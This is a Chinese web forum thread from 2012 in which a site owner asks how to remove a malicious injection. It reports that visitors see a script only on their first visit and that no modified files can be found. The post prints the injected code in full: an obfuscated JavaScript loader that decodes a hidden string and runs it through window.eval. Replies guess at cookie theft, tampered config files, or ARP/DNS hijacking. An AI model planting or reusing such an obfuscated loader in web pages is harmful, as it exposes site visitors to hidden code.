谁见过这种马，求清除！！！【感谢A大】

yafeiml · 发表于 2012-6-3 12:01:02

本帖最后由 yafeiml 于 2012-6-3 12:11 编辑

访客首次访问有代码，第二次访问就没有了。。
已经搜索2天内修改的文件，无发现js、php、html之类被修改。。。
代码是随机加密的，如下：

<script type='text/javascript'>st="no3nno3mapno3rxcopno3rxukpno3rxtc";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^])&~&_&)!:$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$^]$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!:&_&!$?$:$:$@$^@&*!?!|&:!*!^^]$@&*&+$_!+&~+!+]*+*^!+!:&_&!$?$:$@$^@!|&<!+&?^]$~$^@&!^^^]?!+!+!|^#$~$~$@!^!+$_!*!|&)&<&^&*$?$~&*&_^|$~&!$)!$:$_!*!|&)&<&^&*$?$~&_&~^^$~&!$)*$:$_!*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$_$:$@$~!+&~!|^$_&?!+&]&)$^@!&&<!$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?&&:!*&&&~!?$:$)&*^]$^<$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!*!+!*!_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]!&*!+!^&*!++<!+!+!:!^&+&&$^@!&&<!$|&<^]*@*]^@&+!)!)$?&*^]$^|$:^@&<$_!|!*!^&?$??&*&:&!&?!+$)$!^!*&$!^!+!:&_&!$)$!+!*&^!*&<!+&*+*&)&*&]&*&_!+&!&*!+$)$!!&:&+!+&?$)$|$!&&]&:&&!$!^&*!+$)!&*!$)~&+!:$)<!|!|&*&_&++^&?&:&)&+$)&*$)&&$)$!^!^$:^@!&&<!$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@<&]&*$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$!*!+&*$^@!&&<!$|&@^]&!$_&$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$:!]&^&<!+&^&?$?&]$:!@&&$_!!!:!+&*$?$^)&?!+&]&)^_^)&~&+!:^_^)$~&~&+!:^_^)$~&?!+&]&)^_$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!*&&&~!?!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@"; function e(){e=a.join("$").split("%");for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));return this}var f=e(),a="";for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);window.eval(f.decodeURIComponent(a));</script>

复制代码

Administrator · 发表于 2012-6-3 12:01:25

提示: 作者被禁止或删除内容自动屏蔽

hackfengl · 发表于 2012-6-3 12:02:23

找楼上A大

母‪鸡 · 发表于 2012-6-3 12:02:52

cookie吧，看下文件的修改时间，，，如果是伪造了修改时间的话就手动吧。。一般都放在config还有functions里

yafeiml · 发表于 2012-6-3 12:04:13

Administrator 发表于 2012-6-3 12:01
记录COOKIE的吧

更新帖子了，求看。。

yafeiml · 发表于 2012-6-3 12:05:44

母‪鸡发表于 2012-6-3 12:02
cookie吧，看下文件的修改时间，，，如果是伪造了修改时间的话就手动吧。。一般都放在config还有functions ...

时间戳什么的都检查过了，另不知道是怎么被挂的。。。
以前有过一次，把主题重写，所有文件都更新了一遍才搞定的，工程浩大啊。。。

藐视天地 · 发表于 2012-6-3 12:06:10

不会

Administrator · 发表于 2012-6-3 12:06:52

提示: 作者被禁止或删除内容自动屏蔽

yafeiml · 发表于 2012-6-3 12:08:09

A大已回复，感谢A大。

有个就好 · 发表于 2012-6-3 12:08:49

不是ARP就是DNS

		自动登录	找回密码
密码			注册

Administrator Administrator 当前离线积分 7423	2^# 发表于 2012-6-3 12:01:25 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
Administrator Administrator 当前离线积分 7423
	回复支持反对举报

Administrator Administrator 当前离线积分 7423	8^# 发表于 2012-6-3 12:06:52 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
Administrator Administrator 当前离线积分 7423
	回复支持反对举报

谁见过这种马，求清除！！！【感谢A大】

相关帖子